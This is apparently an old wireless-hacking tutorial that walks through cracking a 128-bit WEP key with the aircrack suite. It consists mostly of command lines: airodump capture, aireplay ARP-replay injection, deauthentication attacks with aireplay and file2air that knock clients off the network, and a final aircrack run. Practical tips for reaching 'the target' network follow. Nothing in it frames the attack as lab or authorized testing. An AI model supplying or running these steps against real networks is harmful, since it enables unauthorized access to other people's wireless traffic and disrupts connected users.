First thing you will need to do is run airodump to capture the necessary IVs.

usage: airodump ath0 <file prefix> <channel> 1

e.g.

#airodump ath0 capture 9 1

Do NOT close down airodump, open a new shell and start aireplay:

usage:  aireplay -3 -b <Networks BSSID> -h <client MAC address> -m 68 -n 68 -d ff:ff:ff:ff:ff:ff ath0

If you are unable to capture an ARP packet you can dissasociate the client and to force it to ARP, you can do this using file2air or aireplay, open a third shell and start file2air/aireplay with the following parameters:

#aireplay -0 1 -a <AP_MAC> -c <Client_MAC> ath0

or

#file2air -i ath0 -r madwifi -n 8000 -d <client MAC address> -s <APs MAC address> -b <Networks BSSID> -f /KNOPPIX/files/deauth.bin NOTE: THIS CAN CAUSE THE KERNEL TO CRASH

If this fails to produce an ARP you will have to try one or more of the following

Move closer to the target
Use a high gain antenna
Increase the number after the -n from 8000
Try a different .bin file, such as beacon.bin

You will need to capture approximately 1 million ivs to crack a 128-bit WEP key.  When you have done this you then run aircrack:

#aircrack capture.ivs

NOTE: It is possible to run aircrack in parallel with airodump but in practice I have found that this will not always crack the WEP key, once airodump has been stopped the WEP key is usually found in a matter of seconds.

<HOME>